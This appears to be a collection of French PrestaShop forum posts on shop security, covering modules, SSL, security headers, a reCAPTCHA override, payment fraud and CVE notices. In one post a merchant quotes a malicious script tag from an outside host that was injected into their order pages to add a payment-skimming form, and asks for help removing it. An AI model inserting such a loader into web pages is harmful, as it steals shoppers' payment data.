Search the Community

Bonjour, je suis ravi de vous présenter notre dernier module Op’art Secure Admin Link. Le but de ce module est de résoudre un problème de sécurité lorsque vous devez partager l’accès au backoffice de votre boutique tout en vous simplifiant la vie. Le module est disponible ici : ➡ https://addons.prestashop.com/fr/securite-access/95150-opart-secure-admin-link-acces-ephemeres-au-backoffice.html ⬅ Vous avez également une vidéo de présentation là : Par défaut sur PrestaShop, créer un accès au backoffice est laborieux. Il faut : Ajouter un nom, un prénom et un email. Créer un mot de passe compliqué. Copier l’URL du backoffice, le login et le mot de passe. Envoyé tout ça à la personne qui doit se connecter à l’admin de votre site. Et très souvent le mot de passe ne fonctionne pas du premier coup et il faut recommencer. Non seulement, c’est pénible, mais aussi et SURTOUT ça engendre des comportements qui mettent votre boutique en DANGER. Comme la création d’accès est laborieuse, beaucoup de marchands ont tendance à utiliser un seul et même accès qu’ils partagent aux différentes personnes qui doivent accéder à leur backoffice. Ou alors, ils créent différents accès, mais oublient de les supprimer, ce qui est assez compréhensible, car vous avez suffisamment de chose à gérer pour ne pas en plus devoir penser à supprimer les accès après qu’un prestataire ait terminé son intervention sur votre boutique. Tous ces comptes qui s’accumulent et qui restent actifs trop longtemps sont des portes d’entrée pour les hackers et personnes malveillantes. On a donc décidé de résoudre ce problème tout en vous simplifiant la vie. Avec Op’art Secure Admin Link, vous allez pouvoir créer en 30 secondes un lien sécurisé de connexion au backoffice. Il n’est plus nécessaire de créer un mot de passe, et de faire de multiple copier-coller. Vous créez le lien en 2 clics, vous le copiez en 1 clic et vous l’envoyez à la personne qui doit se connecter à votre backoffice. Et c’est tout ! Le lien se désactivera automatiquement au bout de quelques jours, le rendant inutilisable. Si vous le désirez, vous avez aussi à votre disposition diverses options pour améliorer encore la sécurité de vos liens : Restriction par IPs Choix de la date de désactivation du lien Suivi des connexions. Choix du profil d’autorisation. Bref, ce module va clairement vous faire gagner du temps tout en améliorant la sécurité de votre boutique ! Bien sûr, si vous avez la moindre question, n'hésitez pas 😉.

Salut, Voici mon dernier module de l'année 2022 qui deviendra un indispensable pour vous durant l'année 2023. Il va vous permettre de sauvegarder automatiquement et régulièrement à l'aide d'une tâche cron la base de données de votre boutique PrestaShop. Vous pouvez programmer la réception de l'archive ainsi créée directement par email. Bien entendu, un petit passage de mon précédent module permettant de nettoyer votre base de données juste avant évitera de sauvegarder des données inutiles et de consommer de l'espace. Pour une fois, je ne propose pas de démonstration de ce module puisqu'il n'est accessible qu'aux employés ayant un profil SuperAdmin, tout cela dans le principe d'une sécurité renforcé et indispensable. Téléchargement : Prestatoolbox : https://www.prestatoolbox.fr/securite/464-module-de-sauvegarde-de-base-de-donnees-pour-prestashop.html Addons : https://addons.prestashop.com/fr/migration-donnees-sauvegarde/90418-sauvegarde-rapide-et-optimisee-de-la-base-de-donnees.html Photos :

Bonjour, J'ai un soucis avec l'envoi d'un formulaire. En gros, je développe un module, j'ai créé un formulaire avec le HelperForm de Presta mais quand je clique sur enregistrer j'ai une erreur ,"Clé de sécurité invalide" : Je peux fournir le code si besoin Merci par avance

Bonjour à tous, Je me présente en tant que membre de l'association Friend of Presta et je pense que beaucoup sur ce forum me connaissent déjà . Depuis quelques mois l'association FoP a crée une cellule sécurité qui analyse l'écosystème de PrestaShop. Nous avons identifié des centaines de modules avec des failles de sécurité. Vous pouvez déjà trouver la liste des modules pour lesquels nous avons déjà crée des CVE en respectant une timeline pour les auteurs de ces modules. Vous pouvez vous inscrire au flux rss ici cette liste est mise à jour tous les mardi et jeudi. Je vais essayer d'ajouter sur ce post toutes les nouvelles failles que nous publions.

Bonjour, auriez-vous d'autres idées pour mettre toutes les sécurités nécessaires dans le htaccess ? Je vérifie avec ce site: https://securityheaders.com/ Pour le moment j'ai mis celles-ci... Merci de vos avis # Security Headers <IfModule mod_headers.c> Header set X-Content-Type-Options "nosniff" Header set X-XSS-Protection "1; mode=block" Header set X-Frame-Options "SAMEORIGIN" Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains" Header always set Referrer-Policy "strict-origin-when-cross-origin" Header set Expect-CT "enforce, max-age=604800" #Header set Content-Security-Policy "default-src script-src script-src 'nonce-uG2bsk6JIH923nsvp01n24KE' 'unsafe-inline' 'unsafe-eval' 'self';" Header always set Permissions-Policy "accelerometer=(self); ambient-light-sensor=(self); autoplay=(self); camera=(self); encrypted-media=(self); fullscreen=(self); geolocation=(self); gyroscope=(self); magnetometer=(self); microphone=(self); midi=(self); payment=(self); picture-in-picture=(*); speaker=(self); sync-xhr=(*); usb=(self); vr=(self);" Header always edit Set-Cookie (.*) "$1; HTTPOnly; Secure" Header set Connection keep-alive </IfModule>

Bonjour Dans le code de mes pages de commande, avant toute la structure classique de la page , se trouve une balise script qui appelle un script malveillant. <script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> <!DOCTYPE HTML> <!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="fr-fr"><![endif]--> <!--[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="fr-fr"><![endif]--> <!--[if IE 8]><html class="no-js lt-ie9 ie8" lang="fr-fr"><![endif]--> <!--[if gt IE 8]><html class="no-js ie9" lang="fr-fr"><![endif]--> <html lang="fr-fr"><head><meta charset="utf-8" /><title>Comman ...... Celui-ci ré-arrange le DOM pour s'incruster dedans et rajouter un petit formulaire dans la partie paiement (j'ai désactivé celui-ci) Est-ce que quelqu'un a rencontré ce problème ? Le problème m'a l'air assez complexe après 2 jours à retourner fichiers et BDD sans rien trouver de significatif. Edit : Je suis sous Prestashop 1.6 Merci d'avance

Bonjour, J'aurais besoin d'aide pour activer le SSL sur mon site. J'essaye depuis hier toutes les options mais rien n'y fait ! (Changement du fichier htaccess, modification de la base de donnée pour forcer l'activation du SSL sur prestashop etc.). J'ai écumé tous les forums et essayé toutes les solutions proposés mais j'ai toujours le même problème : l'option pour activer le SSL sur tout le site reste grisé dans mon back-office. Je clique sur le lien "Veuillez cliquer ici pour vérifier que votre boutique supporte le protocole HTTPS.", la page passe en https, mais après plus rien, pas d'option pour activer le SSL et la ligne dessous (Activer le SSL sur tout le site) reste toujours grisé. J'ai vérifié avec mon hébergeur (Online) et j'ai bien un certificat valide délivré par Let's Encrypt, donc le problème ne vient pas d'eux. Est-ce que quelqu'un aurait une solution? Merci beaucoup pour votre aide !

Bonjour Nous avonbs ces temps ci des problèmes générés par des accès malgré firewall programmé et respect des conseils OVH en ùmatière de sécurité Rien ne s'indique dans les logs, mais des fichiers sont ajoutés et génère un affichage de page dangereuse. Je recherche un conseil sécurité efficace pour corriger ce problème Prestashop 1.6.9 Le site nous propose de passeer en 1.6.20, mais nous avons peur que des modules soient alors non fonctionnels. Que dois je faire ? passer en 1.7 ? Selon mon développeur, il faut alors refaire tout le site ??? :-(

Bonjour, Je souhaite limiter la durée de conservation des données de connexion à mon site web. J'ai vu qu'il était possible de spécifier une durée : semaine, mois ou années au delà de laquelle les données sont supprimées. Voir dans "connection.php" : public static function cleanConnectionsPages() { $period = Configuration::get('PS_STATS_OLD_CONNECT_AUTO_CLEAN'); if ($period === 'week') $interval = '1 WEEK'; else if ($period === 'month') $interval = '1 MONTH'; else if ($period === 'year') $interval = '1 YEAR'; else return; if ($interval != null) { // Records of connections details older than the beginning of the specified interval are deleted Db::getInstance()->execute(' DELETE FROM `'._DB_PREFIX_.'connections_page` WHERE time_start < LAST_DAY(DATE_SUB(NOW(), INTERVAL '.$interval.'))'); } } Par contre, je ne sais pas du tout comment/où définir cette valeur de "Configuration::get('PS_STATS_OLD_CONNECT_AUTO_CLEAN')". Je l'ai ajouté à la table "ps_configuration", mais ça n'a rien changé. Quelqu'un saurait me dire comment on est censé faire ? Merci !

Bonjour à tous ! Je rencontre actuellement un soucis avec mon back-office sur Prestashop 1.4.7. En effet, dès que je souhaite accéder aux onglets du BO, j'ai la page "Clé de sécurité invalide" qui apparaît. Bon, j'ai déjà épluché maintes et maintes fois les autres pages qui font références aux problèmes de "invalid token", avec des fichiers à modifier (les "amp", les "&", etc...), or ces fichiers n'existent pas sous cette forme sur la version 1.4 ... Où ai-je mal vu / lu / compris ? J'ai trouvé l'astuce de redéfinir l'adresse url directement pour accéder à mes onglets, cependant ce n'est pas une solution viable car je ne peux pas en modifier le contenu ! Aussi, pour les personnes qui vont faire un bond (voire trois) en arrière lorsqu'ils vont lire ma version, sachez que c'est en cours d'actualisation sur une version plus récente Merci beaucoup et bonne journée à tous !

Bonjour, Ces jours ci, plusieurs clients m'ont demandé de sécuriser leurs formulaires de contacts, et il parait que certains font des devis énormes pour ajouter un simple captcha.. Je partage la marche à suivre que j'ai trouvé sur d'autres forums, je ne suis pas l'auteur de ce code, je l'ai juste un peu personnalisé. En espérant que cela puisse aider le max de personnes. Peut etre que je ferais un module à l'occasion, mais pas le temps en ce moment. 1/ Inscrivez votre site sur : https://www.google.com/recaptcha/admin Choisissez reCAPTCHA V2 (le 1er choix), puis saisissez votre nom de domaine ( 1 site par ligne) Vous aurez ensuite la "clé public" ou "clé du site" (à placer dans le header de votre theme) et la clé secrète (à placer côté serveur, dans le ContactController.php) 2/ Créez ou modifier ce fichier : /override/controller/ContactController.php afin de modifier la fonction postProcess, comme ci-dessous. N'oubliez pas de modifier le $secret_key <?php /* * 2007-2015 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author PrestaShop SA <[email protected]> * @copyright 2007-2015 PrestaShop SA * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ class ContactController extends ContactControllerCore { public function postProcess() { if (Tools::isSubmit('submitMessage')) { $secret_key="YOUR SECRET KEY"; /* TODO: tune this https://www.google.com/recaptcha/admin */ $human=1; if (empty($_REQUEST['g-recaptcha-response'])){ sleep(25); die('not human'); $human=0; } $opts = array('http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => http_build_query( array( 'secret' => $secret_key, /* TODO: tune this https://www.google.com/recaptcha/admin */ 'response' => $_REQUEST['g-recaptcha-response'], ) ), ), ); $stream = stream_context_create($opts); $captcha = @json_decode(file_get_contents('https://www.google.com/recaptcha/api/siteverify', false, $stream), true); if (empty($captcha) || empty($captcha['success']) || !$captcha['success']){ sleep(25); // die('not human'.PHP_EOL.print_r($captcha,1)); die('not human'); $human=0; } if($human==1){ parent::postProcess(); } } } } 3/ Modifier votre fichier header.tpl dans votre theme, en rajoutant simplement juste avant le </head>, et en modifiant la variable de la key "YOUR-PUBLIC-KEY" . Pour la 1.7, il faut aller dans le theme puis layout, puis modifier layout-both-columns.tpl . {if $page_name=="contact"} {literal} <script> var googlecaptchasitekey = 'YOUR-PUBLIC-KEY'; /* TODO: tune this https://www.google.com/recaptcha/admin */ $(document).ready(function(){ var $forms = $('form.contact-form-box'); if ($forms.length > 0){ var captcha = $('<div class="g-recaptcha" data-sitekey="'+ googlecaptchasitekey + '">'); var $submit = $forms.find('#submitMessage'); $submit.before(captcha); $submit.click(function(event){ if ($forms.find('#g-recaptcha-response').val().length == 0) { event.preventDefault(); event.stopPropagation(); return false; } }); } }); </script> <script src='https://www.google.com/recaptcha/api.js?hl={$language_code}'></script> {/literal} {/if} Si votre formulaire de contact n'a pas la class="contact-form-box", alors il faudra adapter mon code. Attention pour la 1.7, le page_name est différent. Il faut marquer : {if $page.page_name=="contact"} ... {/if} Voilà c'est tout, votre formulaire devrait être sécurisé, si vous avez bien renseigné les 2 clés. Il doit surement exister d'autres techniques. Je partage juste ma méthode en espérant pouvoir aider. ContactController.php

Bonjour, Après de longue heures de recherches je ne parviens pas à trouver une réponse satisfaisante à ma question. C'est pourquoi je me tourne vers vous sur ce forum ! J'aimerai avoir des détails sur la méthode d'encodage des mots de passes ! Quel type d'encodage est utilisé ? Comment fonctionne l'encodage des mots de passe ? Qu'est ce que la cookie_key ? Merci d'avance pour vos réponses ! Mat

Bonjour à tous, voici un nouveau module gratuit offert à la communauté. Il permet de contrôler l'email utilisé lors de l'inscription de vos clients et interdire l'utilisation des email temporaire comme yopmail. Ce module s'appuie sur les services et la base de données collectée par le site BDEA. Télécharger le module Contrôle des email d'inscription Compatible : Prestashop 1.5

Bonjour, j'ai activé le certificat ssl sur ma boutique, le SSL est activé, mais le "httpS" ne s'affiche que sur les formulaires de contacte, et authentification. Pourquoi le "httpS" ne s'affiche pas sur toute les pages ? Et surtout pourquoi l'icone cadena n'apparait pas ? Bon dimanche a tous !

Bonjour, J'aimerai savoir si c'est une mauvaise configuration de ma part ou un bug. Si je génère une clé webservice pour une boutique spécifique. En ne sélectionnant qu'elle dans boutiques associées. Je peux par exemple ajouter, lire ou modifier toutes les catégories dans le Prestashop même sur les autres boutiques. Est-ce normal, un oubli ou une mauvaise utilisation du ma part ? Merci d'avance Yannick

Bonjour, La sécurité des nos boutiques, devrais être une préoccupation majeure des développeurs et des utilisateurs finaux, je ne suis pas développeur mais j’espère susciter suffisamment votre intérêt avec ce sujet. Afin d’améliorer considérablement la sécurité des formulaires de création de compte, du login des utilisateurs, ainsi que de l’accès au Backoffice, je me suis toujours posé la question, pour quel raison les développeurs Prestshop n’ont pas encore intégré le chiffrement et ou le HASH, contre les éventuels attaques des hackers ? Pour mieux comprendre l’enjeu et les possibilités techniques de mise en place, je vous invite à consulter les recherches suivantes : http://guillaume-affringue.developpez.com/securite/chiffrement/?page=3#LIII Ce débat et ouvert à tous (développeurs ou simples utilisateurs) et je compte sur votre participation, en espérant qu’une solution concrète sera proposée rapidement, dans notre intérêt commun. Cordialement, Daniel.

Bonjour, J'aimerai faire plusieurs nouvelles pages, je vais donc dans Préférences -> CMS et je fais "Ajouter" là voici l'erreur que j'ai : Pouvez vous me dire quoi faire s'il vous plait ? Merci Draganne

Bonjour, je suis débutante sur prestashop, et c'est la première fois que je poste sur ce forum, merci de m'aider S'il Vous Plait, je suis en train de développer un module, et j'ai besoin de faire des requêtes "SELECT" sur une base de données d'un autre site web sur un autre serveur différent de celui du serveur oû je travaille actuellement, (NB: j'ai l'accès a cette base distante) , S'il vous plait j'ai besoin de savoir comment je peux réaliser ceci, et c'est très urgent, Merci

Bonjour, Nous avons plusieurs tentatives de piratge, ainsi que des modifications de prix commande, suite à une faille interne au module paypal. Il est donc conseillé de vérifier chaque transaction une par une, avant d'envoyer la commande. ( commande validée pour 1 euro pour les plus gourmands ou plus voleurs ... ) Apparement, c'est un probleme similaire a magento, ci joint un article intéressant ; http://korben.info/module-paypal-magento-attention-a-la-faille.html Nous précisons que cette faille est identifiée sur d'anciennes versions de module paypal / prestashop.

Bonjour, il m'arrive quelque chose de surprenant depuis quelques jours. Mon fichier htaccess a été modifié sans que je le sache. J'ai ajoutais il y a 2 semaines des redirections de mes pages anciennes vers mes nouvelles pages. Hier en regardant dans mon fichier htaccess je me suis aperçu que les redirections n'apparaissait plus et je suis sur a 100% de n'avoir rien modifié. Plus fou encore les redirections ont été supprimées ok, mais le problème est que mes anciens URL son bien redirigé vers les nouvelles. Comment des redirections peuvent fonctionner sans quel apparaissent dans le fichier htaccess? J'ai vérifié dans mes FTP log il y a juste eu des tentatives d'intrusion l'accès leur a été refusé et il y a beaucoup d'ip venant des usa et Russie mais toujours est-il qu'aucune intrusion a été faite du côté FTP. Donc si vous pouvez m'aider en me précisant comment : Le fichier htaccess a pu être modifié à mon insu? Comment les redirections fonctionnent-elles alors quel n'apparaissent pas dans le fichier ? Cordialement.

Salut, Pourquoi PS envoi il les MDP aux clients ? C'est pas top niveau sécurité non ? Merci de votre aide

Bonjouer à tous, Je suis en version prestashop 1.4.8.3 La concurrence arrive a voir mon nombre de vente! Comment est-ce possible? Je sais que lorsqu'il y a un achat, le numéro de commande s'incrémente de 1. Le problème est qu'il achète pas sur mon site, mais il réussit à me dire mon nombre de vente....C'est très embêtant et surtt très chiant... Pouvez-vous m'aidez pour que je résouss cette faille?

Nous utilisons tous de plus en plus Prestashop pour la création des sites e-commerce. Et qui dit "sites e-commerce", dit enjeux commerciaux. Face à ces enjeux commerciaux, nous sommes de plus en plus vigilant en ce qui concerne les questions de sécurité: des attaques sur ce type de site sont de plus en plus lourdes en termes de conséquences pour les clients et pour les agence web. J'aimerai recueillir vos avis sur cette question. Merci

Bonjour, Nous venons de sortir un nouveau module qui va vous permettre de vous protéger d'une personne mal attentionné qui souhaiterait accéder à votre boutique. Vous allez pouvoir : - Changer régulièrement l'url d'accès à votre administration - Mettre une demande de login et mot de passe supplémentaire avant d'arriver à la page de connexion habituel de votre administration (avec possibilité d'autorisé certaine IP à sauté cette étape pour un gain de temps) - Être prévenu par email dès qu'une personne essaye de se connecter sur votre administration. L'alert email comprend : - le login testé - le pass testé - l'heure et la date du test - l'I¨P de la personne qui a testé Ainsi vous pourrez surveiller au mieux qui tente de se connecter et prendre les précautions nécessaire. Le module est disponible ici : http://addons.prestashop.com/fr/outils-administration-modules-prestashop/8245-securisez-l-administration-de-votre-prestashop.html Je reste à votre disposition Cordialement, Arthur

Bonjour à tous, Je m'occupe d'un e-commerce utilisant prestashop et depuis peu je reçois des commandes inquiétantes sur mon site . Des commandes groupées, localisées dans une même zone géographique et d'un montant très élevé, le mode de règlement par Paypal, m'insitait à la plus grande prudence. Après avoir contacté leur service Paypal m'ont indiquer qu ils ne voyaient aucun souci, un mois plus tard je recevais une opposition au paiement... Depuis d'autres commandes arrivent toujours avec des prix aussi élevés. Le sytsteme de paiement est lui changé, cependant je n'ai aucune authentification du client... les adresses changent, le mode de paiement change( carte bleue) mais nous avons encore reçu une opposition à un de ces paiements. Nous utilisons System Pay et dès que le paiement est verifier pas 3d secure aucun souci, par contre sans cette authentification chaque paiement et commande est devenu une angoisse!! Quel est le meilleur moyen de s'assurer de la validité d'un paiement, que celui ci est sécurisé, et qu il n'y aura aucun problème par la suite. Le systeme 3d-secure est il une étape obligatoire ou contournable? Je vous remercie et attend vos réponses